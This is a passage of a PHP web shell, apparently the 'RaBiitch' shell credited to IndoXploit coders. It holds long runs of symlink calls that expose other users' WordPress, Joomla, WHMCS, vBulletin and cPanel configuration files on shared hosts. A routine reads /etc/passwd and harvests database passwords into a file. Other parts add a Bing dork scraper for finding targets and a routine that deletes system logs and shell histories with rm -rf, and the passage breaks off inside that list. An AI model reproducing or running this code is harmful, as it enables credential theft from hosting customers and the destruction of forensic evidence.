  2600. @symlink('/home9/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2601. @symlink('/home9/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2602. @symlink('/home9/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2603. @symlink('/home9/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2604. @symlink('/home9/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2605. @symlink('/home9/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2606. @symlink('/home9/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2607. @symlink('/home9/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2608. @symlink('/home9/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2609. @symlink('/home9/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2610. @symlink('/home9/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2611. @symlink('/home9/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2612. @symlink('/home9/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2613. @symlink('/home9/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2614. @symlink('/home9/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2615. @symlink('/home9/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2616. @symlink('/home9/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2617. @symlink('/home9/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2618. @symlink('/home9/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2619.  
  2620. //home 10
  2621.  
  2622. @symlink('/home10/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2623. @symlink('/home10/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2624. @symlink('/home10/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2625. @symlink('/home10/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2626. @symlink('/home10/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2627. @symlink('/home10/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2628. @symlink('/home10/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2629. @symlink('/home10/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2630. @symlink('/home10/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2631. @symlink('/home10/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2632. @symlink('/home10/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2633. @symlink('/home10/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2634. @symlink('/home10/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2635. @symlink('/home10/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2636. @symlink('/home10/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2637. @symlink('/home10/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2638. @symlink('/home10/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2639. @symlink('/home10/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2640. @symlink('/home10/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2641. @symlink('/home10/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2642. @symlink('/home10/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2643. @symlink('/home10/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2644. @symlink('/home10/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2645. @symlink('/home10/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2646. @symlink('/home10/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2647. @symlink('/home10/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2648. @symlink('/home10/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2649. @symlink('/home10/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2650. @symlink('/home10/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2651. @symlink('/home10/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2652. @symlink('/home10/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2653. @symlink('/home10/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2654. @symlink('/home10/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2655. @symlink('/home10/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2656. @symlink('/home10/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2657. @symlink('/home10/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2658. @symlink('/home10/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2659. @symlink('/home10/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2660. @symlink('/home10/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2661. @symlink('/home10/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2662. @symlink('/home10/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2663. @symlink('/home10/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2664. @symlink('/home10/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2665. @symlink('/home10/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2666. @symlink('/home10/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2667. @symlink('/home10/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2668. @symlink('/home10/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2669. @symlink('/home10/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2670. @symlink('/home10/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2671. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2672. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2673. @symlink('/home10/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2674. @symlink('/home10/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2675. @symlink('/home10/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2676. @symlink('/home10/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2677. @symlink('/home10/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2678. @symlink('/home10/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2679. @symlink('/home10/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2680. @symlink('/home10/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2681. @symlink('/home10/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2682. @symlink('/home10/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2683. @symlink('/home10/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2684. @symlink('/home10/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2685. @symlink('/home10/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2686. @symlink('/home10/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2687. @symlink('/home10/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2688. @symlink('/home10/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2689. @symlink('/home10/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2690. @symlink('/home10/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2691. @symlink('/home10/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2692. @symlink('/home10/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2693. @symlink('/home10/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2694. @symlink('/home10/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2695. @symlink('/home10/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2696. @symlink('/home10/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2697. @symlink('/home10/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2698. @symlink('/home10/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2699. @symlink('/home10/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2700. @symlink('/home10/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2701. @symlink('/home10/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2702. @symlink('/home10/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2703. @symlink('/home10/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2704. @symlink('/home10/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2705. @symlink('/home10/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2706. @symlink('/home10/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2707. @symlink('/home10/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2708. @symlink('/home10/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2709. @symlink('/home10/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2710. @symlink('/home10/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2711. @symlink('/home10/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2712. @symlink('/home10/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2713. @symlink('/home10/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2714. @symlink('/home10/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2715. @symlink('/home10/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2716. @symlink('/home10/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2717. @symlink('/home10/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2718. @symlink('/home10/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2719. @symlink('/home10/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2720. @symlink('/home10/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2721. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2722. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2723. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2724. @symlink('/home10/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2725. @symlink('/home10/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2726. @symlink('/home10/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2727. @symlink('/home10/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2728. @symlink('/home10/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2729. @symlink('/home10/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2730. @symlink('/home10/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2731. @symlink('/home10/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2732. @symlink('/home10/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2733. @symlink('/home10/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2734. @symlink('/home10/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2735. @symlink('/home10/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2736. @symlink('/home10/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2737. @symlink('/home10/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2738. @symlink('/home10/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2739. @symlink('/home10/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2740. @symlink('/home10/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2741. @symlink('/home10/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2742. @symlink('/home10/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2743. @symlink('/home10/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2744. @symlink('/home10/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2745. @symlink('/home10/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2746. @symlink('/home10/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2747. @symlink('/home10/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2748. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2749. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2750. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2751. @symlink('/home10/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2752. @symlink('/home10/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2753. @symlink('/home10/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2754. @symlink('/home10/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2755. @symlink('/home10/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2756. @symlink('/home10/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2757. @symlink('/home10/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2758. @symlink('/home10/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2759. @symlink('/home10/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2760. @symlink('/home10/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2761. @symlink('/home10/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2762. @symlink('/home10/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2763. @symlink('/home10/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2764. @symlink('/home10/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2765. @symlink('/home10/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2766. @symlink('/home10/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2767. @symlink('/home10/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2768. @symlink('/home10/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2769. @symlink('/home10/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2770. @symlink('/home10/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2771. @symlink('/home10/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2772. @symlink('/home10/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2773. @symlink('/home10/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2774. @symlink('/home10/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2775. @symlink('/home10/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2776. @symlink('/home10/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2777. @symlink('/home10/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2778. @symlink('/home10/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2779. @symlink('/home10/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2780. @symlink('/home10/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2781. @symlink('/home10/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2782. @symlink('/home10/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2783. @symlink('/home10/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2784. @symlink('/home10/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2785. @symlink('/home10/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2786. @symlink('/home10/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2787. @symlink('/home10/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2788. @symlink('/home10/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2789. @symlink('/home10/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2790. @symlink('/home10/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2791. @symlink('/home10/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2792. @symlink('/home10/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2793. @symlink('/home10/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2794. @symlink('/home10/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2795. @symlink('/home10/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2796. @symlink('/home10/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2797. @symlink('/home10/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2798. @symlink('/home10/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2799. @symlink('/home10/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2800. @symlink('/home10/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2801. @symlink('/home10/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2802. @symlink('/home10/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2803. @symlink('/home10/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2804. }
  2805.  
  2806. //password grab
  2807.  
  2808. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2809. {
  2810.  
  2811. $ar0=explode($marqueurDebutLien, $text);
  2812. $ar1=explode($marqueurFinLien, $ar0[1]);
  2813. $ar=trim($ar1[0]);
  2814. return $ar;
  2815. }
  2816.  
  2817. $ffile=fopen('Passwords.txt','a+');
  2818.  
  2819.  
  2820. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/RaBiitch_symconf/";
  2821. $re=$r;
  2822. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2823.  
  2824. $users=file("/etc/passwd");
  2825. foreach($users as $user)
  2826. {
  2827.  
  2828. $str=explode(":",$user);
  2829. $usersss=$str[0];
  2830. foreach($confi as $co)
  2831. {
  2832.  
  2833.  
  2834. $uurl=$re.$usersss.$co;
  2835. $uel=$uurl;
  2836.  
  2837. $ch = curl_init();
  2838.  
  2839. curl_setopt($ch, CURLOPT_URL, $uel);
  2840. curl_setopt($ch, CURLOPT_HEADER, 1);
  2841. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2842. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2843. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2844. $result['EXE'] = curl_exec($ch);
  2845. curl_close($ch);
  2846. $uxl=$result['EXE'];
  2847.  
  2848.  
  2849. if($uxl && preg_match('/table_prefix/i',$uxl))
  2850. {
  2851.  
  2852. //Wordpress
  2853.  
  2854. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2855. if(!empty($dbp))
  2856. $pass=$dbp."\n";
  2857. fwrite($ffile,$pass);
  2858.  
  2859. }
  2860. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2861. {
  2862.  
  2863. //WHMCS
  2864.  
  2865. $dbp=entre2v2($uxl,"db_password = '","';");
  2866. if(!empty($dbp))
  2867. $pass=$dbp."\n";
  2868. fwrite($ffile,$pass);
  2869.  
  2870. }
  2871.  
  2872.  
  2873. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2874. {
  2875.  
  2876. //Joomla
  2877.  
  2878. $db=entre2v2($uxl,"password = '","';");
  2879. if(!empty($db))
  2880. $pass=$db."\n";
  2881. fwrite($ffile,$pass);
  2882. }
  2883. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2884. {
  2885.  
  2886. //Vbulletin
  2887.  
  2888. $db=entre2v2($uxl,"password'] = '","';");
  2889. if(!empty($db))
  2890. $pass=$db."\n";
  2891. fwrite($ffile,$pass);
  2892.  
  2893. }
  2894. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2895. {
  2896.  
  2897. //Other
  2898.  
  2899. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2900. if(!empty($db))
  2901. $pass=$db."\n";
  2902. fwrite($ffile,$pass);
  2903. }
  2904. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2905. {
  2906.  
  2907. //Other
  2908.  
  2909. $db=entre2v2($uxl,"dbpass = '","';");
  2910. if(!empty($db))
  2911. $pass=$db."\n";
  2912. fwrite($ffile,$pass);
  2913. }
  2914. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2915. {
  2916.  
  2917. //Other
  2918.  
  2919. $db=entre2v2($uxl,"dbpass = '","';");
  2920. if(!empty($db))
  2921. $pass=$db."\n";
  2922. fwrite($ffile,$pass);
  2923.  
  2924. }
  2925. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2926. {
  2927.  
  2928. //Other
  2929.  
  2930. $db=entre2v2($uxl,"dbpass = \"","\";");
  2931. if(!empty($db))
  2932. $pass=$db."\n";
  2933. fwrite($ffile,$pass);
  2934. }
  2935.  
  2936.  
  2937. }
  2938. }
  2939. echo "<center>
  2940. <a href=\"RaBiitch_symconf/root/\">Root Server</a>
  2941. <br><a href=\"RaBiitch_symconf/Passwords.txt\">Passwords</a>
  2942. <br><a href=\"RaBiitch_symconf/\">Configurations</a></center>";
  2943. }
  2944. else
  2945. {
  2946. echo "<center>
  2947. <form method=\"POST\">
  2948. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2949. $file = '/etc/passwd';
  2950. $read = @fopen($file, 'r');
  2951. if ($read){
  2952. $body = @fread($read, @filesize($file));
  2953. echo "".htmlentities($body)."";
  2954. }
  2955. elseif(!$read)
  2956. {
  2957. $read = @show_source($file) ;
  2958. }
  2959. elseif(!$read)
  2960. {
  2961. $read = @highlight_file($file);
  2962. }
  2963. elseif(!$read)
  2964. {
  2965. for($uid=0;$uid<1000;$uid++)
  2966. {
  2967. $ara = posix_getpwuid($uid);
  2968. if (!empty($ara))
  2969. {
  2970. while (list ($key, $val) = each($ara))
  2971. {
  2972. print "$val:";
  2973. }
  2974. print "\n";
  2975. }}}
  2976.  
  2977. flush();
  2978.  
  2979. echo "</textarea>
  2980. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2981. </form></center>";
  2982. }
  2983. }
  2984. } elseif(isset($_GET['RaBiitch']) && ($_GET['RaBiitch'] == 'bing'))
  2985. {   @ini_set('output_buffering',0);
  2986. ?>
  2987. <head>
  2988. <style type="text/css">
  2989. textarea {
  2990.     width: 500px;
  2991.     height: 250px;
  2992.     border: 1px solid #000000;
  2993.     margin: 5px auto;
  2994.     padding: 7px;
  2995. }
  2996. input[type=text] {
  2997.     padding-left: 7px;
  2998.     width: 250px;
  2999.     height: 25px;
  3000.     border: 1px solid #000;
  3001.     background: white;
  3002.     margin: 5px auto;
  3003. }
  3004. </style>
  3005. </head>
  3006. <center><form method="post">
  3007. Bing Dork: <input type="text" name="dork" placeholder="dork" required>
  3008. <input type="submit" name="go" value=">>">
  3009. </form>
  3010. <?php
  3011. // coded by Mr. Magnom
  3012. // Re-Coded to Web Based by Mr. Error 404 - IndoXploit
  3013. // greetz to Mr. Magnom - Sanjungan Jiwa
  3014. function getsource($url, $proxy) {
  3015.     $curl = curl_init($url);
  3016.     curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  3017.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3018.     if($proxy) {
  3019.         $proxy = explode(':', autoprox());
  3020.         curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
  3021.         curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
  3022.     }
  3023.     $content = curl_exec($curl);
  3024.     curl_close($curl);
  3025.     return $content;
  3026. }
  3027. $dork = htmlspecialchars($_POST['dork']);
  3028. $do = urlencode($dork);
  3029. if(isset($_POST['go'])) {
  3030.     $npage = 1;
  3031.     $npages = 30000;
  3032.     $allLinks = array();
  3033.     $lll = array();
  3034.     while($npage <= $npages) {
  3035.         $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
  3036.         if($x) {
  3037.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  3038.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  3039.             $npage = $npage + 10;
  3040.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  3041.         } else break;
  3042.     }
  3043.     $URLs = array();
  3044.     foreach($allLinks as $url){
  3045.         $exp = explode("/", $url);
  3046.         $URLs[] = $exp[2];
  3047.     }
  3048.     $array = array_filter($URLs);
  3049.     $array = array_unique($array);
  3050.     $sss = count(array_unique($array));
  3051.     echo "ToTaL SiTe : $sss<br>";
  3052.     foreach($array as $domain) {
  3053.         echo "http://$domain/<br>";
  3054.     }
  3055. }
  3056. }elseif($_GET['RaBiitch'] == 'info') {
  3057. echo '<br><table width="700" align="center">
  3058. <tr><td>
  3059. <center>
  3060. System : '.$sys.'<br>
  3061. IP : '.$ip.'<br>
  3062. Safe Mode : '.$sm.'<br>
  3063. Disabled Functions : '.$ds.'<br>
  3064. Home_root : '.$home_r.'
  3065. </center>
  3066. </td></tr>
  3067. </table>';
  3068.  
  3069.  
  3070.  
  3071. }elseif($_GET['RaBiitch'] == 'kill') {
  3072. $fileini = $_SERVER['SCRIPT_FILENAME'];
  3073. rmdir('RaBiitch_sym');rmdir('RaBiitch_conf');unlink($fileini);
  3074. echo 'Good By User :)';
  3075. }elseif($_GET['RaBiitch'] == 'logs') {
  3076.     echo '<br><center><b><span>Pengaman Bro ( Sefty Can Be Fun )</span></b><center><br>';
  3077.     echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";      
  3078.     exec("rm -rf /tmp/logs");
  3079.     exec("rm -rf /root/.ksh_history");
  3080.     exec("rm -rf /root/.bash_history");
  3081.     exec("rm -rf /root/.bash_logout");
  3082.     exec("rm -rf /usr/local/apache/logs");
  3083.     exec("rm -rf /usr/local/apache/log");
  3084.     exec("rm -rf /var/apache/logs");
  3085.     exec("rm -rf /var/apache/log");
  3086.     exec("rm -rf /var/run/utmp");
  3087.     exec("rm -rf /var/logs");
  3088.     exec("rm -rf /var/log");
  3089.     exec("rm -rf /var/adm");
  3090.     exec("rm -rf /etc/wtmp");
  3091.     exec("rm -rf /etc/utmp");
  3092.     exec("rm -rf $HISTFILE");
  3093.     exec("rm -rf /var/log/lastlog");
  3094.     exec("rm -rf /var/log/wtmp");
  3095.  
  3096.     shell_exec("rm -rf /tmp/logs");
  3097.     shell_exec("rm -rf /root/.ksh_history");
  3098.     shell_exec("rm -rf /root/.bash_history");
  3099.     shell_exec("rm -rf /root/.bash_logout");
  3100.     shell_exec("rm -rf /usr/local/apache/logs");
